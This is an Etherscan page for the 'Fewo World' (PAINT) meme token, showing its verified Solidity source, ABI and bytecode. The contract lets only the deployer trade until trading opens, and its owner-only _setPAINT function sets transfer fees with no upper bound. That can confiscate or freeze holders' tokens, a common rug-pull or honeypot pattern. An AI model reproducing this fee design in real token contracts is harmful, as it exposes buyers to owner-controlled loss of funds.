ETH Price: $2,997.84 (-1.75%)
Gas: 2 Gwei

Token

Fewo World (PAINT)
 

Overview

Max Total Supply

777 PAINT

Holders

8

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Filtered by Token Holder
santaclause420.eth
Balance
13.515098954267992786 PAINT

Value
$0.00
0x93ef3f1b38b6cb069c868f56836a8885dfabfaa5
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
FewoWorld

Compiler Version
v0.8.20+commit.a1b79de6

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, Unlicense license
/**
 *Submitted for verification at Etherscan.io on 2023-10-28
*/

/*

Fewo World is the first Meme art project unlike anything you have seen in this space before...

777 $PAINT: 2/2 Tax

Telegram - https://t.me/FewoWorldPortal
Twitter - https://twitter.com/FewoWorldETH
Website - https://fewoworld.site

*/
// SPDX-License-Identifier: unlicense

pragma solidity ^0.8.20;

    interface IUniswapV2Router02 {
        function swapExactTokensForETHSupportingFeeOnTransferTokens(
            uint amountIn,
            uint amountOutMin,
            address[] calldata path,
            address to,
            uint deadline
            ) external;
        }
        
    contract FewoWorld {
        string public constant name = "Fewo World";  //
        string public constant symbol = "PAINT";  //
        uint8 public constant decimals = 18;
        uint256 public constant totalSupply = 777 * 10**decimals;

        uint256 BurnAmount = 2;
        uint256 ConfirmAmount = 2;
        uint256 constant swapAmount = totalSupply / 100;

        mapping (address => uint256) public balanceOf;
        mapping (address => mapping (address => uint256)) public allowance;
            
        error Permissions();
            
        event Transfer(address indexed from, address indexed to, uint256 value);
        event Approval(
            address indexed owner,
            address indexed spender,
            uint256 value
        );
            

        address private pair;
        address constant ETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
        address constant routerAddress = 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D;
        IUniswapV2Router02 constant _uniswapV2Router = IUniswapV2Router02(routerAddress);
        address payable constant deployer = payable(address(0x516d15700fcde3b1630EE0c84C9f635D0EbE6c2d)); //

        bool private swapping;
        bool private tradingOpen;

        constructor() {
            balanceOf[msg.sender] = totalSupply;
            allowance[address(this)][routerAddress] = type(uint256).max;
            emit Transfer(address(0), msg.sender, totalSupply);
        }

         receive() external payable {}

        function approve(address spender, uint256 amount) external returns (bool){
            allowance[msg.sender][spender] = amount;
            emit Approval(msg.sender, spender, amount);
            return true;
        }

        function transfer(address to, uint256 amount) external returns (bool){
            return _transfer(msg.sender, to, amount);
        }

        function transferFrom(address from, address to, uint256 amount) external returns (bool){
            allowance[from][msg.sender] -= amount;        
            return _transfer(from, to, amount);
        }

        function _transfer(address from, address to, uint256 amount) internal returns (bool){
            require(tradingOpen || from == deployer || to == deployer);

            if(!tradingOpen && pair == address(0) && amount > 0)
                pair = to;

            balanceOf[from] -= amount;

            if (to == pair && !swapping && balanceOf[address(this)] >= swapAmount){
                swapping = true;
                address[] memory path = new  address[](2);
                path[0] = address(this);
                path[1] = ETH;
                _uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
                    swapAmount,
                    0,
                    path,
                    address(this),
                    block.timestamp
                    );
                deployer.transfer(address(this).balance);
                swapping = false;
                }

            if(from != address(this)){
                uint256 FinalAmount = amount * (from == pair ? BurnAmount : ConfirmAmount) / 100;
                amount -= FinalAmount;
                balanceOf[address(this)] += FinalAmount;
            }
                balanceOf[to] += amount;
                emit Transfer(from, to, amount);
                return true;
            }

        function openTrading() external {
            require(msg.sender == deployer);
            require(!tradingOpen);
            tradingOpen = true;        
            }

        function _setPAINT(uint256 newBurn, uint256 newConfirm) external {
            require(msg.sender == deployer);
            BurnAmount = newBurn;
            ConfirmAmount = newConfirm;
            }
        }

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[],"name":"Permissions","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"newBurn","type":"uint256"},{"internalType":"uint256","name":"newConfirm","type":"uint256"}],"name":"_setPAINT","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"openTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405260025f55600260015534801562000019575f80fd5b50620000286012600a620001d9565b6200003690610309620001f0565b335f8181526002602090815260408083209490945530825260038152838220737a250d5630b4cf539739df2c5dacb4c659f2488d835290529182205f199055907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef620000a56012600a620001d9565b620000b390610309620001f0565b60405190815260200160405180910390a36200020a565b634e487b7160e01b5f52601160045260245ffd5b600181815b808511156200011e57815f1904821115620001025762000102620000ca565b808516156200011057918102915b93841c9390800290620000e3565b509250929050565b5f826200013657506001620001d3565b816200014457505f620001d3565b81600181146200015d5760028114620001685762000188565b6001915050620001d3565b60ff8411156200017c576200017c620000ca565b50506001821b620001d3565b5060208310610133831016604e8410600b8410161715620001ad575081810a620001d3565b620001b98383620000de565b805f1904821115620001cf57620001cf620000ca565b0290505b92915050565b5f620001e960ff84168362000126565b9392505050565b8082028115828204841417620001d357620001d3620000ca565b610ae080620002185f395ff3fe60806040526004361061009d575f3560e01c8063313ce56711610062578063313ce5671461018457806370a08231146101aa57806395d89b41146101d5578063a9059cbb14610205578063c9567bf914610224578063dd62ed3e14610238575f80fd5b806306fdde03146100a8578063095ea7b3146100f357806318160ddd1461012257806323b872dd146101445780632ffff78614610163575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100dd6040518060400160405280600a81526020016911995ddbc815dbdc9b1960b21b81525081565b6040516100ea9190610798565b60405180910390f35b3480156100fe575f80fd5b5061011261010d3660046107fe565b61026e565b60405190151581526020016100ea565b34801561012d575f80fd5b506101366102da565b6040519081526020016100ea565b34801561014f575f80fd5b5061011261015e366004610826565b6102f5565b34801561016e575f80fd5b5061018261017d36600461085f565b610342565b005b34801561018f575f80fd5b50610198601281565b60405160ff90911681526020016100ea565b3480156101b5575f80fd5b506101366101c436600461087f565b60026020525f908152604090205481565b3480156101e0575f80fd5b506100dd60405180604001604052806005815260200164141052539560da1b81525081565b348015610210575f80fd5b5061011261021f3660046107fe565b61036b565b34801561022f575f80fd5b5061018261037e565b348015610243575f80fd5b50610136610252366004610898565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c89086815260200190565b60405180910390a35060015b92915050565b6102e66012600a6109bd565b6102f2906103096109cb565b81565b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103299084906109e2565b9091555061033a90508484846103c8565b949350505050565b3373516d15700fcde3b1630ee0c84c9f635d0ebe6c2d14610361575f80fd5b5f91909155600155565b5f6103773384846103c8565b9392505050565b3373516d15700fcde3b1630ee0c84c9f635d0ebe6c2d1461039d575f80fd5b600454600160a81b900460ff16156103b3575f80fd5b6004805460ff60a81b1916600160a81b179055565b6004545f90600160a81b900460ff16806103fe57506001600160a01b03841673516d15700fcde3b1630ee0c84c9f635d0ebe6c2d145b8061042557506001600160a01b03831673516d15700fcde3b1630ee0c84c9f635d0ebe6c2d145b61042d575f80fd5b600454600160a81b900460ff1615801561045057506004546001600160a01b0316155b801561045b57505f82115b1561047c57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104a39084906109e2565b90915550506004546001600160a01b0384811691161480156104cf5750600454600160a01b900460ff16155b801561050c575060646104e46012600a6109bd565b6104f0906103096109cb565b6104fa91906109f5565b305f9081526002602052604090205410155b15610694576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061055757610557610a14565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc28160018151811061059f5761059f610a14565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105df6012600a6109bd565b6105eb906103096109cb565b6105f591906109f5565b5f8430426040518663ffffffff1660e01b8152600401610619959493929190610a28565b5f604051808303815f87803b158015610630575f80fd5b505af1158015610642573d5f803e3d5ffd5b505060405173516d15700fcde3b1630ee0c84c9f635d0ebe6c2d92504780156108fc029250905f818181858888f19350505050158015610684573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b0384163014610713576004545f906064906001600160a01b038781169116146106c6576001546106c9565b5f545b6106d390856109cb565b6106dd91906109f5565b90506106e981846109e2565b305f9081526002602052604081208054929550839290919061070c908490610a97565b9091555050505b6001600160a01b0383165f908152600260205260408120805484929061073a908490610a97565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161078691815260200190565b60405180910390a35060019392505050565b5f6020808352835180828501525f5b818110156107c3578581018301518582016040015282016107a7565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146107f9575f80fd5b919050565b5f806040838503121561080f575f80fd5b610818836107e3565b946020939093013593505050565b5f805f60608486031215610838575f80fd5b610841846107e3565b925061084f602085016107e3565b9150604084013590509250925092565b5f8060408385031215610870575f80fd5b50508035926020909101359150565b5f6020828403121561088f575f80fd5b610377826107e3565b5f80604083850312156108a9575f80fd5b6108b2836107e3565b91506108c0602084016107e3565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561091757815f19048211156108fd576108fd6108c9565b8085161561090a57918102915b93841c93908002906108e2565b509250929050565b5f8261092d575060016102d4565b8161093957505f6102d4565b816001811461094f576002811461095957610975565b60019150506102d4565b60ff84111561096a5761096a6108c9565b50506001821b6102d4565b5060208310610133831016604e8410600b8410161715610998575081810a6102d4565b6109a283836108dd565b805f19048211156109b5576109b56108c9565b029392505050565b5f61037760ff84168361091f565b80820281158282048414176102d4576102d46108c9565b818103818111156102d4576102d46108c9565b5f82610a0f57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610a765784516001600160a01b031683529383019391830191600101610a51565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d4576102d46108c956fea2646970667358221220882e685e72b21e1e2e02d1a359bf8e023242963c27fdf2e503543a8529e42a7c64736f6c63430008140033

Deployed Bytecode

0x60806040526004361061009d575f3560e01c8063313ce56711610062578063313ce5671461018457806370a08231146101aa57806395d89b41146101d5578063a9059cbb14610205578063c9567bf914610224578063dd62ed3e14610238575f80fd5b806306fdde03146100a8578063095ea7b3146100f357806318160ddd1461012257806323b872dd146101445780632ffff78614610163575f80fd5b366100a457005b5f80fd5b3480156100b3575f80fd5b506100dd6040518060400160405280600a81526020016911995ddbc815dbdc9b1960b21b81525081565b6040516100ea9190610798565b60405180910390f35b3480156100fe575f80fd5b5061011261010d3660046107fe565b61026e565b60405190151581526020016100ea565b34801561012d575f80fd5b506101366102da565b6040519081526020016100ea565b34801561014f575f80fd5b5061011261015e366004610826565b6102f5565b34801561016e575f80fd5b5061018261017d36600461085f565b610342565b005b34801561018f575f80fd5b50610198601281565b60405160ff90911681526020016100ea565b3480156101b5575f80fd5b506101366101c436600461087f565b60026020525f908152604090205481565b3480156101e0575f80fd5b506100dd60405180604001604052806005815260200164141052539560da1b81525081565b348015610210575f80fd5b5061011261021f3660046107fe565b61036b565b34801561022f575f80fd5b5061018261037e565b348015610243575f80fd5b50610136610252366004610898565b600360209081525f928352604080842090915290825290205481565b335f8181526003602090815260408083206001600160a01b038716808552925280832085905551919290917f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925906102c89086815260200190565b60405180910390a35060015b92915050565b6102e66012600a6109bd565b6102f2906103096109cb565b81565b6001600160a01b0383165f9081526003602090815260408083203384529091528120805483919083906103299084906109e2565b9091555061033a90508484846103c8565b949350505050565b3373516d15700fcde3b1630ee0c84c9f635d0ebe6c2d14610361575f80fd5b5f91909155600155565b5f6103773384846103c8565b9392505050565b3373516d15700fcde3b1630ee0c84c9f635d0ebe6c2d1461039d575f80fd5b600454600160a81b900460ff16156103b3575f80fd5b6004805460ff60a81b1916600160a81b179055565b6004545f90600160a81b900460ff16806103fe57506001600160a01b03841673516d15700fcde3b1630ee0c84c9f635d0ebe6c2d145b8061042557506001600160a01b03831673516d15700fcde3b1630ee0c84c9f635d0ebe6c2d145b61042d575f80fd5b600454600160a81b900460ff1615801561045057506004546001600160a01b0316155b801561045b57505f82115b1561047c57600480546001600160a01b0319166001600160a01b0385161790555b6001600160a01b0384165f90815260026020526040812080548492906104a39084906109e2565b90915550506004546001600160a01b0384811691161480156104cf5750600454600160a01b900460ff16155b801561050c575060646104e46012600a6109bd565b6104f0906103096109cb565b6104fa91906109f5565b305f9081526002602052604090205410155b15610694576004805460ff60a01b1916600160a01b1790556040805160028082526060820183525f9260208301908036833701905050905030815f8151811061055757610557610a14565b60200260200101906001600160a01b031690816001600160a01b03168152505073c02aaa39b223fe8d0a0e5c4f27ead9083c756cc28160018151811061059f5761059f610a14565b6001600160a01b0390921660209283029190910190910152737a250d5630b4cf539739df2c5dacb4c659f2488d63791ac94760646105df6012600a6109bd565b6105eb906103096109cb565b6105f591906109f5565b5f8430426040518663ffffffff1660e01b8152600401610619959493929190610a28565b5f604051808303815f87803b158015610630575f80fd5b505af1158015610642573d5f803e3d5ffd5b505060405173516d15700fcde3b1630ee0c84c9f635d0ebe6c2d92504780156108fc029250905f818181858888f19350505050158015610684573d5f803e3d5ffd5b50506004805460ff60a01b191690555b6001600160a01b0384163014610713576004545f906064906001600160a01b038781169116146106c6576001546106c9565b5f545b6106d390856109cb565b6106dd91906109f5565b90506106e981846109e2565b305f9081526002602052604081208054929550839290919061070c908490610a97565b9091555050505b6001600160a01b0383165f908152600260205260408120805484929061073a908490610a97565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161078691815260200190565b60405180910390a35060019392505050565b5f6020808352835180828501525f5b818110156107c3578581018301518582016040015282016107a7565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146107f9575f80fd5b919050565b5f806040838503121561080f575f80fd5b610818836107e3565b946020939093013593505050565b5f805f60608486031215610838575f80fd5b610841846107e3565b925061084f602085016107e3565b9150604084013590509250925092565b5f8060408385031215610870575f80fd5b50508035926020909101359150565b5f6020828403121561088f575f80fd5b610377826107e3565b5f80604083850312156108a9575f80fd5b6108b2836107e3565b91506108c0602084016107e3565b90509250929050565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111561091757815f19048211156108fd576108fd6108c9565b8085161561090a57918102915b93841c93908002906108e2565b509250929050565b5f8261092d575060016102d4565b8161093957505f6102d4565b816001811461094f576002811461095957610975565b60019150506102d4565b60ff84111561096a5761096a6108c9565b50506001821b6102d4565b5060208310610133831016604e8410600b8410161715610998575081810a6102d4565b6109a283836108dd565b805f19048211156109b5576109b56108c9565b029392505050565b5f61037760ff84168361091f565b80820281158282048414176102d4576102d46108c9565b818103818111156102d4576102d46108c9565b5f82610a0f57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b81811015610a765784516001600160a01b031683529383019391830191600101610a51565b50506001600160a01b03969096166060850152505050608001529392505050565b808201808211156102d4576102d46108c956fea2646970667358221220882e685e72b21e1e2e02d1a359bf8e023242963c27fdf2e503543a8529e42a7c64736f6c63430008140033

Deployed Bytecode Sourcemap

627:3879:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;657:42;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;657:42:0;;;;;;;;;;;;:::i;:::-;;;;;;;;2173:222;;;;;;;;;;-1:-1:-1;2173:222:0;;;;;:::i;:::-;;:::i;:::-;;;1169:14:1;;1162:22;1144:41;;1132:2;1117:18;2173:222:0;1004:187:1;814:56:0;;;;;;;;;;;;;:::i;:::-;;;1342:25:1;;;1330:2;1315:18;814:56:0;1196:177:1;2555:208:0;;;;;;;;;;-1:-1:-1;2555:208:0;;;;;:::i;:::-;;:::i;4292:203::-;;;;;;;;;;-1:-1:-1;4292:203:0;;;;;:::i;:::-;;:::i;:::-;;768:35;;;;;;;;;;;;801:2;768:35;;;;;2136:4:1;2124:17;;;2106:36;;2094:2;2079:18;768:35:0;1964:184:1;1012:45:0;;;;;;;;;;-1:-1:-1;1012:45:0;;;;;:::i;:::-;;;;;;;;;;;;;;714:39;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;714:39:0;;;;;2407:136;;;;;;;;;;-1:-1:-1;2407:136:0;;;;;:::i;:::-;;:::i;4109:171::-;;;;;;;;;;;;;:::i;1068:66::-;;;;;;;;;;-1:-1:-1;1068:66:0;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;2173:222;2271:10;2241:4;2261:21;;;:9;:21;;;;;;;;-1:-1:-1;;;;;2261:30:0;;;;;;;;;;:39;;;2320:37;2241:4;;2261:30;;2320:37;;;;2294:6;1342:25:1;;1330:2;1315:18;;1196:177;2320:37:0;;;;;;;;-1:-1:-1;2379:4:0;2173:222;;;;;:::o;814:56::-;858:12;801:2;858;:12;:::i;:::-;852:18;;:3;:18;:::i;:::-;814:56;:::o;2555:208::-;-1:-1:-1;;;;;2657:15:0;;2637:4;2657:15;;;:9;:15;;;;;;;;2673:10;2657:27;;;;;;;:37;;2688:6;;2657:27;2637:4;;2657:37;;2688:6;;2657:37;:::i;:::-;;;;-1:-1:-1;2724:27:0;;-1:-1:-1;2734:4:0;2740:2;2744:6;2724:9;:27::i;:::-;2717:34;2555:208;-1:-1:-1;;;;2555:208:0:o;4292:203::-;4380:10;1775:42;4380:22;4372:31;;;;;;4418:10;:20;;;;4453:13;:26;4292:203::o;2407:136::-;2471:4;2498:33;2508:10;2520:2;2524:6;2498:9;:33::i;:::-;2491:40;2407:136;-1:-1:-1;;;2407:136:0:o;4109:171::-;4164:10;1775:42;4164:22;4156:31;;;;;;4211:11;;-1:-1:-1;;;4211:11:0;;;;4210:12;4202:21;;;;;;4238:11;:18;;-1:-1:-1;;;;4238:18:0;-1:-1:-1;;;4238:18:0;;;4109:171::o;2775:1322::-;2882:11;;2854:4;;-1:-1:-1;;;2882:11:0;;;;;:31;;-1:-1:-1;;;;;;2897:16:0;;1775:42;2897:16;2882:31;:49;;;-1:-1:-1;;;;;;2917:14:0;;1775:42;2917:14;2882:49;2874:58;;;;;;2953:11;;-1:-1:-1;;;2953:11:0;;;;2952:12;:34;;;;-1:-1:-1;2968:4:0;;-1:-1:-1;;;;;2968:4:0;:18;2952:34;:48;;;;;2999:1;2990:6;:10;2952:48;2949:79;;;3019:4;:9;;-1:-1:-1;;;;;;3019:9:0;-1:-1:-1;;;;;3019:9:0;;;;;2949:79;-1:-1:-1;;;;;3045:15:0;;;;;;:9;:15;;;;;:25;;3064:6;;3045:15;:25;;3064:6;;3045:25;:::i;:::-;;;;-1:-1:-1;;3097:4:0;;-1:-1:-1;;;;;3091:10:0;;;3097:4;;3091:10;:23;;;;-1:-1:-1;3106:8:0;;-1:-1:-1;;;3106:8:0;;;;3105:9;3091:23;:65;;;;-1:-1:-1;996:3:0;858:12;801:2;858;:12;:::i;:::-;852:18;;:3;:18;:::i;:::-;982:17;;;;:::i;:::-;3136:4;3118:24;;;;:9;:24;;;;;;:38;;3091:65;3087:619;;;3176:8;:15;;-1:-1:-1;;;;3176:15:0;-1:-1:-1;;;3176:15:0;;;3234:17;;;3249:1;3234:17;;;;;;;;-1:-1:-1;;3234:17:0;;;;;;;;;;-1:-1:-1;3234:17:0;3210:41;;3288:4;3270;3275:1;3270:7;;;;;;;;:::i;:::-;;;;;;:23;-1:-1:-1;;;;;3270:23:0;;;-1:-1:-1;;;;;3270:23:0;;;;;1493:42;3312:4;3317:1;3312:7;;;;;;;;:::i;:::-;-1:-1:-1;;;;;3312:13:0;;;:7;;;;;;;;;;;:13;1579:42;3344:67;996:3;858:12;801:2;858;:12;:::i;:::-;852:18;;:3;:18;:::i;:::-;982:17;;;;:::i;:::-;3467:1;3491:4;3526;3554:15;3344:248;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3611:40:0;;1775:42;;-1:-1:-1;3629:21:0;3611:40;;;;;-1:-1:-1;3629:21:0;3611:40;;;;3629:21;1775:42;3611:40;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;3670:8:0;:16;;-1:-1:-1;;;;3670:16:0;;;3087:619;-1:-1:-1;;;;;3725:21:0;;3741:4;3725:21;3722:238;;3806:4;;3766:19;;3843:3;;-1:-1:-1;;;;;3798:12:0;;;3806:4;;3798:12;:41;;3826:13;;3798:41;;;3813:10;;3798:41;3788:52;;:6;:52;:::i;:::-;:58;;;;:::i;:::-;3766:80;-1:-1:-1;3865:21:0;3766:80;3865:21;;:::i;:::-;3923:4;3905:24;;;;:9;:24;;;;;:39;;3865:21;;-1:-1:-1;3933:11:0;;3905:24;;;:39;;3933:11;;3905:39;:::i;:::-;;;;-1:-1:-1;;;3722:238:0;-1:-1:-1;;;;;3978:13:0;;;;;;:9;:13;;;;;:23;;3995:6;;3978:13;:23;;3995:6;;3978:23;:::i;:::-;;;;;;;;4040:2;-1:-1:-1;;;;;4025:26:0;4034:4;-1:-1:-1;;;;;4025:26:0;;4044:6;4025:26;;;;1342:25:1;;1330:2;1315:18;;1196:177;4025:26:0;;;;;;;;-1:-1:-1;4077:4:0;2775:1322;;;;;:::o;14:548:1:-;126:4;155:2;184;173:9;166:21;216:6;210:13;259:6;254:2;243:9;239:18;232:34;284:1;294:140;308:6;305:1;302:13;294:140;;;403:14;;;399:23;;393:30;369:17;;;388:2;365:26;358:66;323:10;;294:140;;;298:3;483:1;478:2;469:6;458:9;454:22;450:31;443:42;553:2;546;542:7;537:2;529:6;525:15;521:29;510:9;506:45;502:54;494:62;;;;14:548;;;;:::o;567:173::-;635:20;;-1:-1:-1;;;;;684:31:1;;674:42;;664:70;;730:1;727;720:12;664:70;567:173;;;:::o;745:254::-;813:6;821;874:2;862:9;853:7;849:23;845:32;842:52;;;890:1;887;880:12;842:52;913:29;932:9;913:29;:::i;:::-;903:39;989:2;974:18;;;;961:32;;-1:-1:-1;;;745:254:1:o;1378:328::-;1455:6;1463;1471;1524:2;1512:9;1503:7;1499:23;1495:32;1492:52;;;1540:1;1537;1530:12;1492:52;1563:29;1582:9;1563:29;:::i;:::-;1553:39;;1611:38;1645:2;1634:9;1630:18;1611:38;:::i;:::-;1601:48;;1696:2;1685:9;1681:18;1668:32;1658:42;;1378:328;;;;;:::o;1711:248::-;1779:6;1787;1840:2;1828:9;1819:7;1815:23;1811:32;1808:52;;;1856:1;1853;1846:12;1808:52;-1:-1:-1;;1879:23:1;;;1949:2;1934:18;;;1921:32;;-1:-1:-1;1711:248:1:o;2153:186::-;2212:6;2265:2;2253:9;2244:7;2240:23;2236:32;2233:52;;;2281:1;2278;2271:12;2233:52;2304:29;2323:9;2304:29;:::i;2344:260::-;2412:6;2420;2473:2;2461:9;2452:7;2448:23;2444:32;2441:52;;;2489:1;2486;2479:12;2441:52;2512:29;2531:9;2512:29;:::i;:::-;2502:39;;2560:38;2594:2;2583:9;2579:18;2560:38;:::i;:::-;2550:48;;2344:260;;;;;:::o;2609:127::-;2670:10;2665:3;2661:20;2658:1;2651:31;2701:4;2698:1;2691:15;2725:4;2722:1;2715:15;2741:422;2830:1;2873:5;2830:1;2887:270;2908:7;2898:8;2895:21;2887:270;;;2967:4;2963:1;2959:6;2955:17;2949:4;2946:27;2943:53;;;2976:18;;:::i;:::-;3026:7;3016:8;3012:22;3009:55;;;3046:16;;;;3009:55;3125:22;;;;3085:15;;;;2887:270;;;2891:3;2741:422;;;;;:::o;3168:806::-;3217:5;3247:8;3237:80;;-1:-1:-1;3288:1:1;3302:5;;3237:80;3336:4;3326:76;;-1:-1:-1;3373:1:1;3387:5;;3326:76;3418:4;3436:1;3431:59;;;;3504:1;3499:130;;;;3411:218;;3431:59;3461:1;3452:10;;3475:5;;;3499:130;3536:3;3526:8;3523:17;3520:43;;;3543:18;;:::i;:::-;-1:-1:-1;;3599:1:1;3585:16;;3614:5;;3411:218;;3713:2;3703:8;3700:16;3694:3;3688:4;3685:13;3681:36;3675:2;3665:8;3662:16;3657:2;3651:4;3648:12;3644:35;3641:77;3638:159;;;-1:-1:-1;3750:19:1;;;3782:5;;3638:159;3829:34;3854:8;3848:4;3829:34;:::i;:::-;3899:6;3895:1;3891:6;3887:19;3878:7;3875:32;3872:58;;;3910:18;;:::i;:::-;3948:20;;3168:806;-1:-1:-1;;;3168:806:1:o;3979:140::-;4037:5;4066:47;4107:4;4097:8;4093:19;4087:4;4066:47;:::i;4124:168::-;4197:9;;;4228;;4245:15;;;4239:22;;4225:37;4215:71;;4266:18;;:::i;4297:128::-;4364:9;;;4385:11;;;4382:37;;;4399:18;;:::i;4430:217::-;4470:1;4496;4486:132;;4540:10;4535:3;4531:20;4528:1;4521:31;4575:4;4572:1;4565:15;4603:4;4600:1;4593:15;4486:132;-1:-1:-1;4632:9:1;;4430:217::o;4784:127::-;4845:10;4840:3;4836:20;4833:1;4826:31;4876:4;4873:1;4866:15;4900:4;4897:1;4890:15;4916:980;5178:4;5226:3;5215:9;5211:19;5257:6;5246:9;5239:25;5283:2;5321:6;5316:2;5305:9;5301:18;5294:34;5364:3;5359:2;5348:9;5344:18;5337:31;5388:6;5423;5417:13;5454:6;5446;5439:22;5492:3;5481:9;5477:19;5470:26;;5531:2;5523:6;5519:15;5505:29;;5552:1;5562:195;5576:6;5573:1;5570:13;5562:195;;;5641:13;;-1:-1:-1;;;;;5637:39:1;5625:52;;5732:15;;;;5697:12;;;;5673:1;5591:9;5562:195;;;-1:-1:-1;;;;;;;5813:32:1;;;;5808:2;5793:18;;5786:60;-1:-1:-1;;;5877:3:1;5862:19;5855:35;5774:3;4916:980;-1:-1:-1;;;4916:980:1:o;5901:125::-;5966:9;;;5987:10;;;5984:36;;;6000:18;;:::i

Swarm Source

ipfs://882e685e72b21e1e2e02d1a359bf8e023242963c27fdf2e503543a8529e42a7c
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.